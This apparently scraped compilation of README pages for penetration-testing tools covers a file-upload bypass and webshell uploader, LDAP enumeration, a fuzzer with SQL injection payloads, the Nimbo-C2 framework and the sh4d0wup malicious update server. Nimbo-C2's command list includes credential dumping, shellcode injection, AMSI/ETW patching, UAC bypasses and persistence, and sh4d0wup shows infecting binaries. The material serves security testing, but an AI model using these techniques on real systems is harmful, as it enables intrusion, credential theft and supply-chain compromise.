Upload_Bypass is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.
Please note that the use of Upload_Bypass and any actions taken with it are solely at your own risk. The tool is provided for educational and testing purposes only. The developer of Upload_Bypass is not responsible for any misuse, damage, or illegal activities caused by its usage.
While Upload_Bypass aims to assist Pentesters and Bug Hunters in testing file upload mechanisms, it is essential to obtain proper authorization and adhere to applicable laws and regulations before performing any security assessments. Always ensure that you have the necessary permissions from the relevant stakeholders before conducting any testing activities.
The results and findings obtained from using Upload_Bypass should be communicated responsibly and in accordance with established disclosure processes. It is crucial to respect the privacy and integrity of the tested systems and refrain from causing harm or disruption.
By using Upload_Bypass, you acknowledge that the developer cannot be held liable for any consequences resulting from its use. Use the tool responsibly and ethically to promote the security and integrity of web applications.
Download the latest version from Releases page.
pip install -r requirements.txt
The tool will not function properly if the file upload mechanism includes CAPTCHA implementation.
Perhaps in the future the tool will include an OCR.
The Tool is compatible exclusively with output file requests generated by Burp Suite.
Before saving the Burp file, replace the file content with the string *content*, replace filename.ext with the string *filename*, and replace the Content-Type header with *mimetype* (only if the tool is not able to recognize it automatically).
How a request should look before the changes:
How it should look after the changes:
If the tool fails to recognize the mime type automatically, you can add *mimetype* in the parameter's value of the Content-Type header.
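For illustration, after those substitutions a multipart upload request saved from Burp might look roughly like this (the host, path, boundary and form field names below are hypothetical):

POST /upload.php HTTP/1.1
Host: target.local
Content-Type: multipart/form-data; boundary=----boundary

------boundary
Content-Disposition: form-data; name="file"; filename="*filename*"
Content-Type: *mimetype*

*content*
------boundary--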
Options: -h, --help
show this help message and exit
-b BURP_FILE, --burp-file BURP_FILE
Required - Read from a Burp Suite file
Usage: -b / --burp-file ~/Desktop/output
-s SUCCESS_MESSAGE, --success SUCCESS_MESSAGE
Required if -f is not set - Provide the success message when a file is uploaded
Usage: -s /--success 'File uploaded successfully.'
-f FAILURE_MESSAGE, --failure FAILURE_MESSAGE
Required if -s is not set - Provide a failure message when a file is uploaded
Usage: -f /--failure 'File is not allowed!'
-e FILE_EXTENSION, --extension FILE_EXTENSION
Required - Provide server backend extension
Usage: -e / --extension php (Supported extensions: php,asp,jsp,perl,coldfusion)
-a ALLOWED_EXTENSIONS, --allowed ALLOWED_EXTENSIONS
Required - Provide allowed extensions to be uploaded
Usage: -a /--allowed jpeg, png, zip, etc'
-l WEBSHELL_LOCATION, --location WEBSHELL_LOCATION
Provide a remote path where the WebShell will be uploaded (won't work if the file will be uploaded with a UUID).
Usage: -l / --location /uploads/
-rl NUMBER, --rate-limit NUMBER
Set rate-limiting with milliseconds between each request.
Usage: -r / --rate-limit 700
-p PROXY_NUM, --proxy PROXY_NUM
Channel the HTTP requests via proxy client (i.e Burp Suite).
Usage: -p / --proxy http://127.0.0.1:8080
-S, --ssl
If set, the tool will not validate TLS/SSL certificate.
Usage: -S / --ssl
-c, --continue
If set, the brute force will continue even if one of the methods gets a hit!
Usage: -C /--continue
-E, --eicar
If set, an Eicar file(Anti Malware Testfile) will be uploaded only. WebShells will not be uploaded (Suitable for real environments).
Usage: -E / --eicar
-v, --verbose
If set, details about the test will be printed on the screen
Usage: -v / --verbose
-r, --response
If set, HTTP response will be printed on the screen
Usage: -r / --response
--version
Print the current version of the tool.
--update
Checks for new updates. If there is a new update, it will be downloaded and updated automatically.
python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e php -a jpeg --response -v --eicar --continue
python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e asp -a zip -v
python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e jsp -a png -v --proxy http://127.0.0.1:8080
SysReptor is a fully customisable, offensive security reporting tool designed for pentesters, red teamers and other security-related people alike. You can create designs based on simple HTML and CSS, write your reports in user-friendly Markdown and convert them to PDF with just a single click, in the cloud or on-premise!
You just want to start reporting and save yourself all the effort of setting up, configuring and maintaining a dedicated server? Then SysReptor Cloud is the right choice for you! Get to know SysReptor on our Playground and if you like it, you can get your personal Cloud instance here:
You prefer self-hosting? That's fine! You will need:
You can then install SysReptor via script:
curl -s https://docs.sysreptor.com/install.sh | bash
After successful installation, access your application at http://localhost:8000/.
Get detailed installation instructions at Installation.
msLDAPDump simplifies LDAP enumeration in a domain environment by wrapping Python's ldap3 library in an easy-to-use interface. Like most of my tools, this one works best on Windows. If using Unix, the tool will currently not resolve hostnames that are not accessible via eth0.
Users can bind to LDAP anonymously through the tool and dump basic information about LDAP, including domain naming context, domain controller hostnames, and more.
Each check outputs the raw contents to a text file, and an abbreviated, cleaner version of the results in the terminal environment. The results in the terminal are pulled from the individual text files.
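The anonymous-bind phase described above boils down to a few lines of ldap3; a hedged sketch, where the domain controller hostname is an assumption and this is not msLDAPDump's actual code:

from ldap3 import ALL, Connection, Server

server = Server("dc01.example.local", get_info=ALL)   # assumed DC hostname
conn = Connection(server, auto_bind=True)             # anonymous bind (no credentials)

# The RootDSE exposes the domain naming context and related attributes
print(server.info.naming_contexts)
print(server.info.other.get("defaultNamingContext"))

conn.unbind()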
Please keep in mind that this tool is meant for ethical hacking and penetration testing purposes only. I do not condone any behavior that would include testing targets that you do not currently have permission to test against.
Serial No. | Tool Name | Serial No. | Tool Name |
---|---|---|---|
1 | whatweb | 2 | nmap |
3 | golismero | 4 | host |
5 | wget | 6 | uniscan |
7 | wafw00f | 8 | dirb |
9 | davtest | 10 | theharvester |
11 | xsser | 12 | fierce |
13 | dnswalk | 14 | dnsrecon |
15 | dnsenum | 16 | dnsmap |
17 | dmitry | 18 | nikto |
19 | whois | 20 | lbd |
21 | wapiti | 22 | devtest |
23 | sslyze | | |
Critical:- Vulnerabilities that score in the critical range usually have most of the following characteristics: exploitation of the vulnerability likely results in root-level compromise of servers or infrastructure devices. Exploitation is usually straightforward, in the sense that the attacker does not need any special authentication credentials or knowledge about individual victims, and does not need to persuade a target user, for example via social engineering, into performing any special functions.
High:- An attacker can fully compromise the confidentiality, integrity or availability of a target system without specialized access, user interaction or circumstances that are beyond the attacker's control. Very likely to allow lateral movement and escalation of the attack to other systems on the internal network of the vulnerable application. The vulnerability is difficult to exploit. Exploitation could result in elevated privileges. Exploitation could result in significant data loss or downtime.
Medium:- An attacker can partially compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker's control may be required for an attack to succeed. Very likely to be used in conjunction with other vulnerabilities to escalate an attack. Includes vulnerabilities that require the attacker to manipulate individual victims via social engineering tactics, denial of service vulnerabilities that are difficult to set up, exploits that require an attacker to reside on the same local network as the victim, vulnerabilities where exploitation provides only very limited access, and vulnerabilities that require user privileges for successful exploitation.
Low:- An attacker has limited scope to compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker's control are required for an attack to succeed. Needs to be used in conjunction with other vulnerabilities to escalate an attack.
Info:- An attacker can obtain information about the web site. This is not necessarily a vulnerability, but any information which an attacker obtains might be used to craft a more accurate attack at a later date. It is recommended to restrict any information disclosure as far as possible.
CVSS V3 Score Range | Severity in Advisory |
---|---|
0.1 - 3.9 | Low |
4.0 - 6.9 | Medium |
7.0 - 8.9 | High |
9.0 - 10.0 | Critical |
Run the program as: python3 web_scan.py https://example.com (or http://example.com)
--help
--update
Serial No. | Vulnerabilities to Scan | Serial No. | Vulnerabilities to Scan |
---|---|---|---|
1 | IPv6 | 2 | Wordpress |
3 | SiteMap/Robot.txt | 4 | Firewall |
5 | Slowloris Denial of Service | 6 | HEARTBLEED |
7 | POODLE | 8 | OpenSSL CCS Injection |
9 | FREAK | 10 | Firewall |
11 | LOGJAM | 12 | FTP Service |
13 | STUXNET | 14 | Telnet Service |
15 | LOG4j | 16 | Stress Tests |
17 | WebDAV | 18 | LFI, RFI or RCE |
19 | XSS, SQLi, BSQL | 20 | XSS Header not present |
21 | Shellshock Bug | 22 | Leaks Internal IP |
23 | HTTP PUT DEL Methods | 24 | MS10-070 |
25 | Outdated | 26 | CGI Directories |
27 | Interesting Files | 28 | Injectable Paths |
29 | Subdomains | 30 | MS-SQL DB Service |
31 | ORACLE DB Service | 32 | MySQL DB Service |
33 | RDP Server over UDP and TCP | 34 | SNMP Service |
35 | Elmah | 36 | SMB Ports over TCP and UDP |
37 | IIS WebDAV | 38 | X-XSS Protection |
git clone https://github.com/Malwareman007/Scanner-and-Patcher.git
cd Scanner-and-Patcher/setup
python3 -m pip install --no-cache-dir -r requirements.txt
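Once the requirements are installed, a scan can be started as shown in the usage line above; this assumes web_scan.py sits in the repository root, and example.com is a placeholder target:
cd ..
python3 web_scan.py https://example.com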
Template contributions, Feature Requests and Bug Reports are more than welcome.
Contributions, issues and feature requests are welcome!
Feel free to check issues page.
Firefly is an advanced black-box fuzzer and not just a standard asset discovery tool. Firefly provides the advantage of testing a target with a large number of built-in checks to detect behaviors in the target.
Note:
Firefly is in a very new stage (v1.0) but works well for now, if the target does not contain too much dynamic content. Firefly still detects and filters dynamic changes, but not yet perfectly.
go install -v github.com/Brum3ns/firefly/cmd/firefly@latest
If the above install method does not work, try the following:
git clone https://github.com/Brum3ns/firefly.git
cd firefly/
go build cmd/firefly/firefly.go
./firefly -h
firefly -h
firefly -u 'http://example.com/?query=FUZZ'
Different types of request input that can be used
Basic
firefly -u 'http://example.com/?query=FUZZ' --timeout 7000
Request with different methods and protocols
firefly -u 'http://example.com/?query=FUZZ' -m GET,POST,PUT -p https,http,ws
echo 'http://example.com/?query=FUZZ' | firefly
firefly -r '
GET /?query=FUZZ HTTP/1.1
Host: example.com
User-Agent: FireFly'
This sends the raw HTTP request and auto-detects all GET and/or POST parameters to fuzz.
firefly -r '
POST /?A=1 HTTP/1.1
Host: example.com
User-Agent: Firefly
X-Host: FUZZ
B=2&C=3' -au replace
The request verifier is the most important part. This feature lets Firefly learn the core behavior of the target you fuzz. It's important to favor quality over quantity: more verify requests lead to better quality, at the cost of hardware performance (depending on your machine).
firefly -u 'http://example.com/?query=FUZZ' -e
Payloads can be highly customized, and with a good core wordlist it's possible to fully adapt the payload wordlist within Firefly itself.
Display the format of all payloads and exit
firefly -show-payload
List all available tampers
firefly -list-tamper
Tamper all payloads with a given type (more than one can be used, separated by commas)
firefly -u 'http://example.com/?query=FUZZ' -e s2c
Hex encode all payloads
firefly -u 'http://example.com/?query=FUZZ' -e hex
Hex then URL encode all payloads
firefly -u 'http://example.com/?query=FUZZ' -e hex,url
firefly -u 'http://example.com/?query=FUZZ' -pr '\([0-9]+=[0-9]+\) => (13=(37-24))'
The payloads:
' or (1=1)-- -
and" or(20=20)or "
will result in:
' or (13=(37-24))-- -
and" or(13=(37-24))or "
where the => (with spaces) indicates the "replace to" value.
Filter options to filter/match requests that include a given rule.
Filter responses to ignore (filter) status code 302 and line count 0
firefly -u 'http://example.com/?query=FUZZ' -fc 302 -fl 0
Filter responses to include (match) a regex and status code 200
firefly -u 'http://example.com/?query=FUZZ' -mr '[Ee]rror (at|on) line \d' -mc 200
firefly -u 'http://example.com/?query=FUZZ' -mr 'MySQL' -mc 200
Performance and time delays to use for the request process
Threads / Concurrency
firefly -u 'http://example.com/?query=FUZZ' -t 35
Time delay in milliseconds (ms) for each concurrent thread
firefly -u 'http://example.com/?query=FUZZ' -t 35 -dl 2000
Wordlists that contain the payloads can be added separately or extracted from a given folder
Single Wordlist with its attack type
firefly -u 'http://example.com/?query=FUZZ' -w wordlist.txt:fuzz
Extract all wordlists inside a folder. The attack type depends on the suffix <type>_wordlist.txt
firefly -u 'http://example.com/?query=FUZZ' -w wl/
Example
Wordlist names inside the folder wl:
- fuzz_wordlist.txt
- time_wordlist.txt
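A minimal sketch of preparing such a folder; the source wordlist names are placeholders, only the <type>_wordlist.txt suffix convention matters:
mkdir wl
cp my-fuzz-payloads.txt wl/fuzz_wordlist.txt   # attack type "fuzz"
cp my-time-payloads.txt wl/time_wordlist.txt   # attack type "time"
firefly -u 'http://example.com/?query=FUZZ' -w wl/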
JSON output is strongly recommended, because you can use the jq tool to navigate through the results and compare them. (If Firefly is chained in a pipeline with other tools, standard plaintext may be a better choice.)
Simple plaintext output format
firefly -u 'http://example.com/?query=FUZZ' -o file.txt
JSON output format (recommended)
firefly -u 'http://example.com/?query=FUZZ' -oJ file.json
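As a starting point for navigating the JSON result with jq (kept schema-agnostic, since the exact output structure is not documented here):
jq . file.json | less    # pretty-print and page through the whole result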
Everyone in the community is welcome to suggest new features, improvements and/or new payloads for Firefly; just make a pull request or add a comment with your suggestions!
The changelog highlights since March's 2023.1 release are:
Nimbo-C2 is yet another (simple and lightweight) C2 framework.
The Nimbo-C2 agent supports x64 Windows & Linux. It's written in Nim, with some use of .NET on Windows (by dynamically loading the CLR into the process). Nim is powerful, but interacting with Windows is much easier and more robust using PowerShell, hence this combination. The Linux agent is slimmer and capable only of basic commands, including ELF loading using the memfd technique.
All server components are written in Python:
My work wouldn't be possible without the previous great work done by others, listed under credits.
The agent's UPX section names (UPX0, UPX1) are changed to make detection and unpacking harder, and behavior is configured through config.jsonc.
Clone the repository and cd into it:
git clone https://github.com/itaymigdal/Nimbo-C2
cd Nimbo-C2
docker build -t nimbo-dependencies .
cd again into the source files and run the Docker image interactively, exposing port 80 and mounting the Nimbo-C2 directory into the container (so you can easily access all project files, modify config.jsonc, download and upload files from agents, etc.). For Linux, replace ${pwd} with $(pwd).
cd Nimbo-C2
docker run -it --rm -p 80:80 -v ${pwd}:/Nimbo-C2 -w /Nimbo-C2 nimbo-dependencies
git clone https://github.com/itaymigdal/Nimbo-C2
cd Nimbo-C2/Nimbo-C2
docker run -it --rm -p 80:80 -v ${pwd}:/Nimbo-C2 -w /Nimbo-C2 itaymigdal/nimbo-dependencies
First, edit config.jsonc
for your needs.
Then run with: python3 Nimbo-C2.py
Use the help
command for each screen, and tab completion.
Also, check the examples directory.
Nimbo-C2 > help
--== Agent ==--
agent list -> list active agents
agent interact <agent-id> -> interact with the agent
agent remove <agent-id> -> remove agent data
--== Builder ==--
build exe -> build exe agent (-h for help)
build dll -> build dll agent (-h for help)
build elf -> build elf agent (-h for help)
--== Listener ==--
listener start -> start the listener
listener stop -> stop the listener
listener status -> print the listener status
--== General ==--
cls -> clear the screen
help -> print this help message
exit -> exit Nimbo-C2
Nimbo-2 [d337c406] > help
--== Send Commands ==--
cmd <shell-command> -> execute a shell command
iex <powershell-scriptblock> -> execute in-memory powershell command
--== File Stuff ==--
download <remote-file> -> download a file from the agent (wrap path with quotes)
upload <local-file> <remote-path> -> upload a file to the agent (wrap paths with quotes)
--== Discovery Stuff ==--
pstree -> show process tree
checksec -> check for security products
software -> check for installed software
--== Collection Stuff ==--
clipboard -> retrieve clipboard
screenshot -> retrieve screenshot
audio <record-time> -> record audio
--== Post Exploitation Stuff ==--
lsass <method> -> dump lsass.exe [methods: direct,comsvcs] (elevation required)
sam -> dump sam,security,system hives using reg.exe (elevation required)
shellc <raw-shellcode-file> <pid> -> inject shellcode to remote process
assembly <local-assembly> <args> -> execute .net assembly (pass all args as a single string using quotes)
warning: make sure the assembly doesn't call any exit function
--== Evasion Stuff ==--
unhook -> unhook ntdll.dll
amsi -> patch amsi out of the current process
etw -> patch etw out of the current process
--== Persistence Stuff ==--
persist run <command> <key-name> -> set run key (will try first hklm, then hkcu)
persist spe <command> <process-name> -> persist using silent process exit technique (elevation required)
--== Privesc Stuff ==--
uac fodhelper <command> <keep/die> -> elevate session using the fodhelper uac bypass technique
uac sdclt <command> <keep/die> -> elevate session using the sdclt uac bypass technique
--== Interaction stuff ==--
msgbox <title> <text> -> pop a message box (blocking! waits for enter press)
speak <text> -> speak using sapi.spvoice com interface
--== Communication Stuff ==--
sleep <sleep-time> <jitter-%> -> change sleep time interval and jitter
clear -> clear pending commands
collect -> recollect agent data
kill -> kill the agent (persistence will still take place)
--== General ==--
show -> show agent details
back -> back to main screen
cls -> clear the screen
help -> print this help message
exit -> exit Nimbo-C2
Nimbo-2 [51a33cb9] > help
--== Send Commands ==--
cmd <shell-command> -> execute a terminal command
--== File Stuff ==--
download <remote-file> -> download a file from the agent (wrap path with quotes)
upload <local-file> <remote-path> -> upload a file to the agent (wrap paths with quotes)
--== Post Exploitation Stuff ==--
memfd <mode> <elf-file> <commandline> -> load elf in-memory using the memfd_create syscall
implant mode: load the elf as a child process and return
task mode: load the elf as a child process, wait on it, and get its output when it's done
(pass the whole commandline as a single string using quotes)
--== Communication Stuff ==--
sleep <sleep-time> <jitter-%> -> change sleep time interval and jitter
clear -> clear pending commands
collect -> recollect agent data
kill -> kill the agent (persistence will still take place)
--== General ==--
show -> show agent details
back -> back to main screen
cls -> clear the screen
help -> print this help message
exit -> exit Nimbo-C2
- When using the assembly command, make sure your assembly doesn't call any exit function, because it will kill the agent.
- The shellc command may unexpectedly crash or change the injected process behavior; test the shellcode and the target process first.
- The audio, lsass and sam commands temporarily save artifacts to disk before exfiltrating and deleting them.
- Cleanup of the persist commands should be done manually.
- Be careful with the uac commands: the die flag may leave you with no active agent (if the unelevated agent thinks that the UAC bypass was successful, and it wasn't), while keep should leave you with 2 active agents probing the C2, after which you should manually kill the unelevated one.
- msgbox is blocking until the user presses the OK button.
This software may be buggy or unstable in some use cases, as it is not fully and constantly tested. Feel free to open issues, PRs, and contact me for any reason at (Gmail | LinkedIn | Twitter).
Fuzztruction is an academic prototype of a fuzzer that does not directly mutate inputs (as most fuzzers do) but instead uses a so-called generator application to produce an input for our fuzzing target. As programs generating data usually produce the correct representation, our fuzzer mutates the generator program (by injecting faults), such that the data produced is almost valid. Optimally, the produced data passes the parsing stages in our fuzzing target, called the consumer, but triggers unexpected behavior in deeper program logic. This makes it possible to fuzz even targets that utilize cryptographic primitives such as encryption or message integrity codes. The main advantage of our approach is that it generates complex data without requiring heavyweight program analysis techniques, grammar approximations, or human intervention.
For instructions on how to reproduce the experiments from the paper, please read the fuzztruction-experiments
submodule documentation after reading this document.
Compatibility: While we try to make sure that our prototype is as platform independent as possible, we are not able to test it on all platforms. Thus, if you run into issues, please use Ubuntu 22.04.1, which was used during development as the host system.
# Clone the repository
git clone --recurse-submodules https://github.com/fuzztruction/fuzztruction.git
# Option 1: Get a pre-built version of our runtime environment.
# To ease reproduction of experiments in our paper, we recommend using our
# pre-built environment to avoid incompatibilities (~30 GB of data will be
# downloaded)
# Do NOT use this if you don't want to reproduce our results but instead want to
# fuzz your own targets (use the next command instead).
./env/pull-prebuilt.sh
# Option 2: Build the runtime environment for Fuzztruction from scratch.
# Do NOT run this if you executed pull-prebuilt.sh
./env/build.sh
# Spawn a container based on the image built/pulled before.
# To spawn a container using the prebuilt image (if pulled above),
# you need to set USE_PREBUILT to 1, e.g., `USE_PREBUILT=1 ./env/start.sh`
./env/start.sh
# Calling this script again will spawn a shell inside the container.
# (can be called multiple times to spawn multiple shells within the same
# container).
./env/start.sh
# Running start.sh a second time will automatically build the fuzzer.
# See `Fuzzing a Target using Fuzztruction` below for further instructions.
Fuzztruction contains the following core components:
The scheduler orchestrates the interaction of the generator and the consumer. It governs the fuzzing campaign, and its main task is to organize the fuzzing loop. In addition, it also maintains a queue containing queue entries. Each entry consists of the seed input passed to the generator (if any) and all mutations applied to the generator. Each such queue entry represents a single test case. In traditional fuzzing, such a test case would be represented as a single file. The implementation of the scheduler is located in the scheduler
directory.
The generator can be considered a seed generator for producing inputs tailored to the fuzzing target, the consumer. While common fuzzing approaches mutate inputs on the fly through bit-level mutations, we mutate inputs indirectly by injecting faults into the generator program. More precisely, we identify and mutate data operations the generator uses to produce its output. To facilitate our approach, we require a program that generates outputs that match the input format the fuzzing target expects.
The implementation of the generator can be found in the generator
directory. It consists of two components that are explained in the following.
The compiler pass (generator/pass
) instruments the target using so-called patch points. Since the current (tested on LLVM12 and below) implementation of this feature is unstable, we patch LLVM to enable them for our approach. The patches can be found in the llvm
repository (included here as submodule). Please note that the patches are experimental and not intended for use in production.
The locations of the patch points are recorded in a separate section inside the compiled binary. The code related to parsing this section can be found at lib/llvm-stackmap-rs
, which we also published on crates.io.
During fuzzing, the scheduler chooses a target from the set of patch points and passes its decision down to the agent (described below) responsible for applying the desired mutation for the given patch point.
The agent, implemented in generator/agent
is running in the context of the generator application that was compiled with the custom compiler pass. Its main tasks are the implementation of a forkserver and communicating with the scheduler. Based on the instruction passed from the scheduler via shared memory and a message queue, the agent uses a JIT engine to mutate the generator.
The generator's counterpart is the consumer: It is the target we are fuzzing that consumes the inputs generated by the generator. For Fuzztruction, it is sufficient to compile the consumer application with AFL++'s compiler pass, which we use to record the coverage feedback. This feedback guides our mutations of the generator.
Before using Fuzztruction, the runtime environment that comes as a Docker image is required. This image can be obtained by building it yourself locally or pulling a pre-built version. Both ways are described in the following. Before preparing the runtime environment, this repository, and all sub repositories, must be cloned:
git clone --recurse-submodules https://github.com/fuzztruction/fuzztruction.git
The Fuzztruction runtime environment can be built by executing env/build.sh
. This builds a Docker image containing a complete runtime environment for Fuzztruction locally. By default, a pre-built version of our patched LLVM version is used and pulled from Docker Hub. If you want to use a locally built LLVM version, check the llvm
directory.
In most cases, there is no particular reason for using the pre-built environment -- except if you want to reproduce the exact experiments conducted in the paper. The pre-built image provides everything, including the pre-built evaluation targets and all dependencies. The image can be retrieved by executing env/pull-prebuilt.sh
.
The following section documents how to spawn a runtime environment based on either a locally built image or the prebuilt one. Details regarding the reproduction of the paper's experiments can be found in the fuzztruction-experiments
submodule.
After building or pulling a pre-built version of the runtime environment, the fuzzer is ready to use. The fuzzer's environment lifecycle is managed by a set of scripts located in the env
folder.
Script | Description |
---|---|
./env/start.sh | Spawn a new container or spawn a shell into an already running container. Prebuilt: Exporting USE_PREBUILT=1 spawns a container based on a pre-built environment. For switching from pre-built to local build or the other way around, stop.sh must be executed first. |
./env/stop.sh | This stops the container. Remember to call this after rebuilding the image. |
Using start.sh
, an arbitrary number of shells can be spawned in the container. Using Visual Studio Codes' Containers extension allows you to work conveniently inside the Docker container.
Several files/folders are mounted from the host into the container to facilitate data exchange. Details regarding the runtime environment are provided in the next section.
This section details the runtime environment (Docker container) provided alongside Fuzztruction. The user in the container is named user
and has passwordless sudo
access by default.
Permissions: The Docker image's user is named
user
and has the same User ID (UID) as the user who initially built the image. Thus, mounts from the host can be accessed inside the container. However, in the case of using the pre-built image, this might not be the case since the image was built on another machine. This must be considered when exchanging data with the host.
Inside the container, the following paths are (bind) mounted from the host:
Container Path | Host Path | Note |
---|---|---|
/home/user/fuzztruction | ./ | Pre-built: This folder is part of the image in case the pre-built image is used. Thus, changes are not reflected to the host. |
/home/user/shared | ./ | Used to exchange data with the host. |
/home/user/.zshrc | ./data/zshrc | - |
/home/user/.zsh_history | ./data/zsh_history | - |
/home/user/.bash_history | ./data/bash_history | - |
/home/user/.config/nvim/init.vim | ./data/init.vim | - |
/home/user/.config/Code | ./data/vscode-data | Used to persist Visual Studio Code config between container restarts. |
/ssh-agent | $SSH_AUTH_SOCK | Allows using the SSH-Agent inside the container if it runs on the host. |
/home/user/.gitconfig | /home/$USER/.gitconfig | Use gitconfig from the host, if there is any config. |
/ccache | ./data/ccache | Used to persist ccache cache between container restarts. |
After building the Docker runtime environment and spawning a container, the Fuzztruction binary itself must be built. After spawning a shell inside the container using ./env/start.sh
, the build process is triggered automatically. Thus, the steps in the next section are primarily for those who want to rebuild Fuzztruction after applying modifications to the code.
For building Fuzztruction, it is sufficient to call cargo build
in /home/user/fuzztruction
. This will build all components described in the Components section. The most interesting build artifacts are the following:
Artifacts | Description |
---|---|
./generator/pass/fuzztruction-source-llvm-pass.so | The LLVM pass is used to insert the patch points into the generator application. Note: The location of the pass is recorded in /etc/ld.so.conf.d/fuzztruction.conf ; thus, compilers are able to find the pass during compilation. If you run into trouble because the pass is not found, please run sudo ldconfig and retry using a freshly spawned shell. |
./generator/pass/fuzztruction-source-clang-fast | A compiler wrapper for compiling the generator application. This wrapper uses our custom compiler pass, links the targets against the agent, and injects a call to the agents' init method into the generator's main. |
./target/debug/libgenerator_agent.so | The agent that is injected into the generator application. |
./target/debug/fuzztruction | The fuzztruction binary representing the actual fuzzer. |
We will use libpng
as an example to showcase Fuzztruction's capabilities. Since libpng
is relatively small and has no external dependencies, it is not required to use the pre-built image for the following steps. However, especially on mobile CPUs, the build process may take up to several hours for the AFL++ binary because of the collision-free coverage map encoding feature and compare splitting.
Pre-built: If the pre-built version is used, building is unnecessary and this step can be skipped.
Switch into the fuzztruction-experiments/comparison-with-state-of-the-art/binaries/
directory and execute ./build.sh libpng
. This will pull the source and start the build according to the steps defined in libpng/config.sh
.
Using the following command
sudo ./target/debug/fuzztruction fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml --purge --show-output benchmark -i 100
allows testing whether the target works. Each target is defined using a YAML
configuration file. The files are located in the configurations
directory and are a good starting point for building your own config. The pngtopng-pngtopng.yml
file is extensively documented.
If the fuzzer terminates with an error, there are multiple ways to assist your debugging efforts:
- Passing --show-output to fuzztruction allows you to observe stdout/stderr of the generator and the consumer if they are not used for passing or reading data from each other.
- The env section of the sink in the YAML config can give you more detailed output regarding the consumer.
- If LD_PRELOAD is used, double check the provided paths.
To start the fuzzing process, executing the following command is sufficient:
sudo ./target/debug/fuzztruction ./fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml fuzz -j 10 -t 10m
This will start a fuzzing run on 10 cores, with a timeout of 10 minutes. Output produced by the fuzzer is stored in the directory defined by the work-directory
attribute in the target's config file. In case of pngtopng
, the default location is /tmp/pngtopng-pngtopng
.
If the working directory already exists, --purge
must be passed as an argument to fuzztruction
to allow it to rerun. The flag must be passed before the subcommand, i.e., before fuzz
or benchmark
.
For running AFL++ alongside Fuzztruction, the aflpp
subcommand can be used to spawn AFL++ workers that are reseeded during runtime with inputs found by Fuzztruction. Assuming that Fuzztruction was executed using the command above, it is sufficient to execute
sudo ./target/debug/fuzztruction ./fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml aflpp -j 10 -t 10m
for spawning 10 AFL++ processes that are terminated after 10 minutes. Inputs found by Fuzztruction and AFL++ are periodically synced into the interesting
folder in the working directory. In case AFL++ should be executed independently but based on the same .yml
configuration file, the --suffix
argument can be used to append a suffix to the working directory of the spawned fuzzer.
After the fuzzing run is terminated, the tracer
subcommand allows to retrieve a list of covered basic blocks for all interesting inputs found during fuzzing. These traces are stored in the traces
subdirectory located in the working directory. Each trace contains a zlib compressed JSON object of the addresses of all basic blocks (in execution order) exercised during execution. Furthermore, metadata to map the addresses to the actual ELF file they are located in is provided.
The coverage
tool located at ./target/debug/coverage
can be used to process the collected data further. You need to pass it the top-level directory containing working directories created by Fuzztruction (e.g., /tmp
in case of the previous example). Executing ./target/debug/coverage /tmp
will generate a .csv
file that maps time to the number of covered basic blocks and a .json
file that maps timestamps to sets of found basic block addresses. Both files are located in the working directory of the specific fuzzing run.
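As a concrete follow-up to the description above, the coverage post-processing for the pngtopng example boils down to:
# Process all working directories below /tmp (the location used in the example above)
./target/debug/coverage /tmp
# -> writes a .csv (time vs. number of covered basic blocks) and a .json
#    (timestamp -> set of basic-block addresses) into each run's working directory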
% docker run -it --rm ghcr.io/kpcyrd/sh4d0wup:edge -h
Usage: sh4d0wup [OPTIONS] <COMMAND>
Commands:
bait Start a malicious update server
front Bind a http/https server but forward everything unmodified
infect High level tampering, inject additional commands into a package
tamper Low level tampering, patch a package database to add malicious packages, cause updates or influence dependency resolution
keygen Generate signing keys with the given parameters
sign Use signing keys to generate signatures
hsm Interact with hardware signing keys
build Compile an attack based on a plot
check Check if the plot can still execute correctly against the configured image
req Emulate a http request to test routing and selectors
completions Generate shell completions
help Print this message or the help of the given subcommand(s)
Options:
-v, --verbose... Increase logging output (can be used multiple times)
-q, --quiet... Reduce logging output (can be used multiple times)
-h, --help Print help information
-V, --version Print version information
Have you ever wondered if the update you downloaded is the same one everybody else gets or did you get a different one that was made just for you? Shadow updates are updates that officially don't exist but carry valid signatures and would get accepted by clients as genuine. This may happen if the signing key is compromised by hackers or if a release engineer with legitimate access turns grimy.
sh4d0wup
is a malicious http/https update server that acts as a reverse proxy in front of a legitimate server and can infect + sign various artifact formats. Attacks are configured in plots
that describe how http request routing works, how artifacts are patched/generated, how they should be signed and with which key. A route can have selectors
so it matches only if e.g. the user-agent matches a pattern or if the client is connecting from a specific IP address. For development and testing, mock signing keys/certificates can be generated and marked as trusted.
Some plots are more complex to run than others; to avoid long startup times due to downloads and artifact patching, you can build a plot in advance. This also allows signatures to be created in advance.
sh4d0wup build ./contrib/plot-hello-world.yaml -o ./plot.tar.zst
This spawns a malicious http update server according to the plot. This also accepts yaml files but they may take longer to start.
sh4d0wup bait -B 0.0.0.0:1337 ./plot.tar.zst
You can find examples here:
contrib/plot-archlinux.yaml
contrib/plot-debian.yaml
contrib/plot-rustup.yaml
contrib/plot-curl-sh.yaml
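For instance, one of the bundled example plots can be built ahead of time and then served, combining the build and bait commands shown above (bind address and port follow the earlier example):
sh4d0wup build ./contrib/plot-archlinux.yaml -o ./plot-archlinux.tar.zst
sh4d0wup bait -B 0.0.0.0:1337 ./plot-archlinux.tar.zst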
sh4d0wup infect elf
% sh4d0wup infect elf /usr/bin/sh4d0wup -c id a.out
[2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Spawning C compiler...
[2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Generating source code...
[2022-12-19T23:50:57Z INFO sh4d0wup::infect::elf] Waiting for compile to finish...
[2022-12-19T23:51:01Z INFO sh4d0wup::infect::elf] Successfully generated binary
% ./a.out help
uid=1000(user) gid=1000(user) groups=1000(user),212(rebuilderd),973(docker),998(wheel)
